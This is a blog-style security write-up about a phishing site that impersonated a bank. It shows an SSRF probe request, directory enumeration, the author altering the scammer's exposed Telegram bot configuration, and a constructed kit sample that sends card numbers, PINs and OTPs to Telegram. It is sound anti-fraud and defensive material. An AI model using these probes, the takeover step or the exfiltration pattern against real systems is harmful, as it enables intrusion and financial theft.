Important Note: This article documents the analysis of a malicious phishing website for educational purposes. The techniques described were used to help shut down criminal operations and protect potential victims.
Hi everyone, how are you? I hope you are all well. I'm RyuuKhagetsu, and this is my article in English, so sorry for any mistakes. I hope you enjoy it.
All of this started when a friend asked me about a website he had just found: a fake site impersonating one of the banks in my country, which had already deceived many people. He asked me to check it out; I will refer to it here as "site.com".
Analyzing a malicious phishing website targeting bank customers
Phishing Website Analysis
This is the landing page of a scam website. It was made only for mobile viewing, designed to appear legitimate to unsuspecting victims. After examining the website for a while, I discovered how this malicious operation works:
The Scam Process
- Credential Harvesting: Victims are asked to enter their 16-digit credit card number and PIN number
- Fake OTP Verification: The victim receives what appears to be an OTP (One-Time Password) message, but it's completely fabricated
- False Error Message: After filling in the fake OTP, the scam website responds that there is a problem in the process and asks victims to come back later
Scammer's Strategy: The fake error message serves multiple purposes - it gives the scammers time to use the stolen credentials while making victims believe the transaction failed, reducing the likelihood of immediate detection.
Technical Vulnerability Analysis
After analyzing the website's functionality, I found several serious bugs in the site itself, one of which was SSRF (Server-Side Request Forgery). I discovered it while entering the OTP code and inspecting the requests sent to the backend.
SSRF Discovery Process
I used Burp Collaborator to test for SSRF by injecting the Collaborator URL into the otp= parameter:
POST /verify-otp HTTP/1.1
Host: site.com
Content-Type: application/x-www-form-urlencoded

otp=http://burp-collaborator-subdomain.com
When I sent the request, I received an interaction on Burp Collaborator. That confirms the server made an outbound request to the URL I supplied: server-side code was taking the otp value and using it as a URL, which is exactly what SSRF means.
Testing SSRF vulnerability using Burp Collaborator
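The manual Collaborator test above is easy to script so that every injected field gets its own canary hostname and any callback can be traced back to the field that caused it. The example below is added here and is not code from the original post: the canary domain example-collab.net, the hostname site.com, the field names and the callback log lines are all constructed for illustration (with Burp you would use the Collaborator domain it generates).

```python
import re
import secrets
from urllib.parse import urlencode

# Constructed canary domain for illustration; Burp Collaborator gives you its own.
CANARY_DOMAIN = "example-collab.net"


def make_probes(params, domain=CANARY_DOMAIN):
    """Give every parameter its own random subdomain of the canary domain.

    Returns (payloads, lookup): payloads maps a field name to the URL to inject,
    lookup maps the random tag back to the field name so callbacks can be attributed.
    """
    payloads, lookup = {}, {}
    for name in params:
        tag = secrets.token_hex(4)            # 8 hex chars, e.g. "3fa9c0d1"
        payloads[name] = f"http://{tag}.{domain}/"
        lookup[tag] = name
    return payloads, lookup


def build_request(host, path, field, payloads, benign):
    """Build one raw HTTP/1.1 POST with only `field` injected; every other
    field keeps a benign value, so a callback can be blamed on one parameter."""
    body = dict(benign)
    body[field] = payloads[field]
    data = urlencode(body)                    # form-encodes the URL, the server decodes it
    return (
        f"POST {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(data)}\r\n"
        f"\r\n{data}"
    )


def correlate(log_lines, lookup, domain=CANARY_DOMAIN):
    """Attribute callback log lines to the injected field.

    A DNS-only hit means something resolved the name (a URL scanner or mail
    filter can do that); an HTTP hit means the server actually fetched the URL,
    which is the stronger evidence of SSRF.
    """
    tag_re = re.compile(r"\b([0-9a-f]{8})\." + re.escape(domain) + r"\b")
    hits = {}
    for line in log_lines:
        m = tag_re.search(line)
        if not m or m.group(1) not in lookup:
            continue
        kind = "http" if re.search(r"\b(GET|POST|HEAD) /", line) else "dns"
        hits.setdefault(lookup[m.group(1)], set()).add(kind)
    return hits


if __name__ == "__main__":
    fields = ["card", "pin", "otp"]
    payloads, lookup = make_probes(fields)
    benign = {"card": "1234567890123456", "pin": "1234", "otp": "123456"}
    for f in fields:
        print(build_request("site.com", "/verify-otp", f, payloads, benign))
    # Constructed callback log: only the otp field triggers a lookup and a fetch.
    otp_tag = next(t for t, n in lookup.items() if n == "otp")
    log = [
        f"DNS A {otp_tag}.{CANARY_DOMAIN} from 203.0.113.7",
        f"HTTP GET / Host: {otp_tag}.{CANARY_DOMAIN} from 203.0.113.7",
    ]
    print(correlate(log, lookup))  # {'otp': {'dns', 'http'}}
```

Injecting one field per request is what makes the attribution reliable; a single request with canaries in every field tells you the backend fetches something, but not which parameter reaches the HTTP client.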
Directory Enumeration and Admin Panel Discovery
I used dirsearch to brute-force the website directories and discovered "admin.php":
Directory enumeration revealing admin panel and configuration files
Admin Panel Analysis and Telegram Bot Discovery
When I accessed admin.php, I initially thought this was a login page. However, upon closer inspection, I discovered this file was used to configure where the stolen data would be sent via a Telegram bot.
On the admin.php page, I found a Telegram bot ID which I believed belonged to the scammer's bot; the original post shows a screenshot of this configuration.
Critical Discovery: The admin panel was completely unsecured, allowing anyone to view and modify the Telegram bot configuration used to receive stolen financial data.
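When a kit's source is in hand (after a takedown, or when the hoster shares it), the first triage step is to locate its exfiltration configuration, because the bot token and chat ID are what let you tie the kit to a Telegram account in a report. The example below is added here and is not code from the original post or the scam site: it scans a small constructed stand-in for a kit for Telegram Bot API endpoints, bot tokens and chat IDs, and masks the tokens so the findings can be shared. The token pattern is an assumption based on the public token format (a numeric bot ID, a colon and a 35-character secret), and the sendMessage call in send.php is an assumed, commonly seen exfiltration pattern, not the real site's code.

```python
import re

# Assumed token shape: "<numeric bot id>:<35 url-safe chars>" (public Telegram format).
TOKEN_RE = re.compile(r"\b(\d{8,10}:[A-Za-z0-9_-]{35})\b")
# chat_id followed by a little punctuation/whitespace and a (possibly negative) numeric id.
CHAT_ID_RE = re.compile(r"chat_id\W{0,4}(-?\d{6,})")
API_RE = re.compile(r"https?://api\.telegram\.org/bot")

# Constructed stand-in for a phishing kit's files (not the real site's code).
SAMPLE_KIT = {
    "admin.php": (
        "<?php\n"
        "// Constructed example: exfil config stored in the kit itself\n"
        "$token = '123456789:AAE012345678901234567890123456789ab';\n"
        "$chat_id = '987654321';\n"
    ),
    "send.php": (
        "<?php\n"
        "include 'admin.php';\n"
        "$msg = 'CC: '.$_POST['cc'].' PIN: '.$_POST['pin'].' OTP: '.$_POST['otp'];\n"
        "file_get_contents(\"https://api.telegram.org/bot$token/sendMessage"
        "?chat_id=$chat_id&text=\".urlencode($msg));\n"
    ),
    "index.html": "<form method=post action=send.php>...</form>\n",
}


def mask_token(token):
    """Keep the bot id (useful for reporting) and hide most of the secret."""
    bot_id, secret = token.split(":", 1)
    return f"{bot_id}:{secret[:4]}{'*' * (len(secret) - 4)}"


def scan_kit(files):
    """Return one finding per indicator as (path, line_no, kind, value)."""
    findings = []
    for path, content in files.items():
        for no, line in enumerate(content.splitlines(), 1):
            if API_RE.search(line):
                findings.append((path, no, "telegram_api", "api.telegram.org"))
            for m in TOKEN_RE.finditer(line):
                findings.append((path, no, "bot_token", mask_token(m.group(1))))
            for m in CHAT_ID_RE.finditer(line):
                findings.append((path, no, "chat_id", m.group(1)))
    return findings


if __name__ == "__main__":
    for path, no, kind, value in scan_kit(SAMPLE_KIT):
        print(f"{path}:{no} {kind} {value}")
```

The bot ID (the part before the colon) is safe to include in a report and is what Telegram's abuse channel needs; the secret after the colon is what lets anyone read or redirect the stolen data, so it should never appear unmasked in anything that gets forwarded.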
Proof of Concept and Data Interception
To demonstrate the severity of this vulnerability and gather evidence, I tried changing the bot ID to my own Telegram bot ID and filled in the form on the website with random test data:
Test Data Used (all fake data, for testing purposes only):
- Card Number: 1234567890123456
- PIN: 1234
- OTP: 123456
When I submitted the form, I received a notification on my Telegram bot confirming that the stolen data was being sent to the configured bot.
Proof of concept showing stolen data being sent to Telegram bot
Technical Vulnerabilities Summary
The phishing website contained multiple serious security vulnerabilities:
- SSRF (Server-Side Request Forgery): Allowing attackers to make requests from the server to internal or external resources
- Unsecured Admin Panel: No authentication required to access sensitive configuration
- Exposed API Credentials: Telegram bot tokens visible in plain text
- Unprotected Files: admin.php and configuration files were discoverable by directory enumeration and readable without any access controls
- Data Leakage: Victim data was forwarded to a third-party messaging service (Telegram) using a configuration that anyone who found admin.php could read or redirect
Impact and Implications
This phishing operation had several concerning implications:
- Financial Fraud: Stolen credit card information could be used for unauthorized transactions
- Identity Theft: Personal banking information could be used for further fraudulent activities
- Mass Victimization: The mobile-optimized design suggested targeting of a large number of potential victims
- Technical Exploitation: SSRF vulnerability could be used for further attacks on internal systems
Responsible Disclosure and Takedown
After gathering sufficient evidence of the malicious activities, I compiled a comprehensive report and sent it to my friend. The report included:
- Screenshots of the phishing website interface
- Technical analysis of the SSRF vulnerability
- Evidence of the Telegram bot configuration
- Proof of concept demonstration
- Recommended actions for law enforcement
My friend reported the findings to the website hosting provider, and the website was successfully suspended, preventing further victims from falling into this trap.
Successful Outcome: The phishing website was taken down, potentially saving countless individuals from financial fraud and identity theft.
Lessons Learned and Security Awareness
This investigation highlights several important security lessons:
For Users:
- Verify URLs carefully: Always check that you're on the official bank website
- Never enter sensitive information on suspicious sites: a card PIN has no place on a web form, and an OTP should only be entered into the channel that initiated the transaction
- Be wary of unsolicited messages: Banks don't typically ask for credentials via email or SMS
- Use official banking apps: Download apps only from official app stores
For Developers:
- Implement proper input validation: use allow-lists (an OTP is six digits, never a URL) and never let user input choose the destination of a server-side request
- Secure administrative interfaces: Use strong authentication and access controls
- Never expose API credentials: Use environment variables and secure configuration
- Regular security testing: Conduct penetration testing and vulnerability assessments
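The SSRF in this kit came from server-side code treating the otp value as a URL. The example below is added here (it is not code from the original post) and shows the two checks a developer would want: allow-list validation of the OTP itself, and, for the cases where a backend legitimately must fetch a URL, a host allow-list plus a resolved-address check that rejects loopback, private, link-local and other non-public targets. The allowed host api.example-bank.test, the resolver injection and the constructed DNS answers are assumptions for illustration.

```python
import ipaddress
import re
import socket
from urllib.parse import urlsplit

OTP_RE = re.compile(r"[0-9]{6}")

# Hypothetical allow-list of hosts the backend is permitted to call.
ALLOWED_HOSTS = {"api.example-bank.test"}


def validate_otp(value):
    """Allow-list validation: an OTP is exactly six ASCII digits.

    A value such as 'http://attacker.example/' never gets past this point,
    so it can never be handed to an HTTP client by mistake.
    """
    if not isinstance(value, str) or not OTP_RE.fullmatch(value):
        raise ValueError("otp must be exactly 6 digits")
    return value


def is_public_ip(text):
    """True only for globally routable unicast addresses; rejects loopback,
    RFC 1918, link-local (including 169.254.169.254 metadata), CGNAT,
    documentation ranges and multicast."""
    ip = ipaddress.ip_address(text)
    return ip.is_global and not ip.is_multicast


def check_outbound_url(url, allowed_hosts=ALLOWED_HOSTS, resolver=socket.getaddrinfo):
    """Validate a URL the server is about to fetch; return (host, port, ips).

    The resolver is injectable so the check can be exercised offline. The
    caller should connect to one of the returned IPs (pinning) rather than
    resolve again, otherwise a DNS-rebinding attacker can change the answer
    between check and use.
    """
    parts = urlsplit(url)
    if parts.scheme != "https":
        raise ValueError("only https is allowed")
    if parts.username or parts.password:
        raise ValueError("credentials in URL are not allowed")
    host = parts.hostname
    if host is None or host.lower() not in allowed_hosts:
        raise ValueError(f"host not in allow-list: {host!r}")
    port = parts.port or 443
    ips = sorted({info[4][0] for info in resolver(host, port)})
    if not ips:
        raise ValueError("host did not resolve")
    bad = [ip for ip in ips if not is_public_ip(ip)]
    if bad:
        raise ValueError(f"host resolves to non-public address(es): {bad}")
    return host, port, ips


if __name__ == "__main__":
    print(validate_otp("123456"))
    for bad in ("http://attacker.example/", "12345"):
        try:
            validate_otp(bad)
        except ValueError as e:
            print(f"rejected {bad!r}: {e}")
    # Constructed resolver answer (assumed public address) so this runs offline.
    fake = lambda host, port: [(socket.AF_INET, socket.SOCK_STREAM, 6, "", ("8.8.8.8", port))]
    print(check_outbound_url("https://api.example-bank.test/verify", resolver=fake))
```

Every address the name resolves to is checked, not just the first, because a name that returns both a public and an internal address is a classic way around single-answer checks.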
Fighting Cybercrime
This case demonstrates the importance of cybersecurity professionals in fighting online crime. By identifying and reporting malicious websites, we can:
- Protect potential victims from financial loss
- Disrupt criminal operations
- Provide evidence for law enforcement
- Improve overall internet security
Conclusion
I hope you can be careful of scams like this. The sophistication of modern phishing attacks means that everyone needs to be vigilant when dealing with online financial services. Always verify the authenticity of websites before entering sensitive information.
This investigation also shows how technical vulnerabilities in malicious websites can be used to gather intelligence and shut down criminal operations. By combining technical analysis with responsible disclosure, we can make the internet a safer place for everyone.
That's all from me; I hope this can be a reference for you, and sorry if anything was unclear. I'm RyuuKhagetsu, see you in the next article.